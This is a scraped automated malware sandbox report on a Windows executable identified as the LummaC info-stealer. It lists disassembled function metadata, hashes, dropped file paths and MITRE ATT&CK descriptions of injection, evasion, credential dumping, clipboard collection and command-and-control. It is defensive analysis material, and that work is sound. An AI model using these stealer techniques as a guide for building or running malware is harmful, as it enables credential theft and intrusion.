Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentStrings
String ID: 8o_
API String ID: 3523873077-3431487031
Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
Instruction ID: 567cd15fffa44155935425f9fde264a2ed78ad556f7456d64a1b329411af5f05
Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
Instruction Fuzzy Hash: 72E0E523DC5B24499771222A3C00B6A1A0A4F81735F11023AEC30C65C2EB38880B699A

Function 00404DFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32

Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46

Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096

Strings

F@, xrefs: 00404E3E

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
Opcode Fuzzy Hash: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C

Function 00428D67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
__CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A

Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D

Strings

Access violation - no RTTI data!, xrefs: 00428D6A

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
Instruction ID: 73ada6d1c6168317e08ecea3a8bb530ed306f4920f562436bdd15de4f867cbc4
Opcode Fuzzy Hash: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
Instruction Fuzzy Hash: FDE0DF726593186A9A04DA91B8469DE73EC8A14300BA0041FBE0092082EF2CF958826D

Function 0042380B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E

Strings

jB, xrefs: 00423811
nB, xrefs: 00423817

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: jB$nB
API String ID: 3275300208-1818383504
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC

Function 004212AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212D9

Strings

pThreadProxy, xrefs: 004212C3

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC

Function 0042AE7A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
GetLastError.KERNEL32 ref: 0042AF1E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A

Function 0211B0E1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,020F2AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,020F2AA3,00000000), ref: 0211B177
GetLastError.KERNEL32 ref: 0211B185
MultiByteToWideChar.KERNEL32(?,00000001,?,?,020F2AA3,00000000), ref: 0211B1E0

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: 0bc0a7416da36cc0ac8b0f6bf1f09f35e736618460a7cd8dfcf2619981926506
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: A3413C31648206AFCF298F65DC447BE7BB5EF01329F254178EC59971A0DB30AB05CB50

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report b0cQukXPAl.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2889.tmp.exe_743a22cd80e3af015dc4cbfb2af65c2bed012cc_b54c7ca3_77cb44fa-d85f-41c1-81de-b172f71ce587\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6302.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6516.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6546.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\2889.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
b0cQukXPAl.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029EA Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D02C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F19 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 020F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402BFA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179
networkCOMMON

Function 004051C6 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 004057F6 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 00402956 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Function 0042DFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E104 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434745 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BA3 Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E064 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 00402394 Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre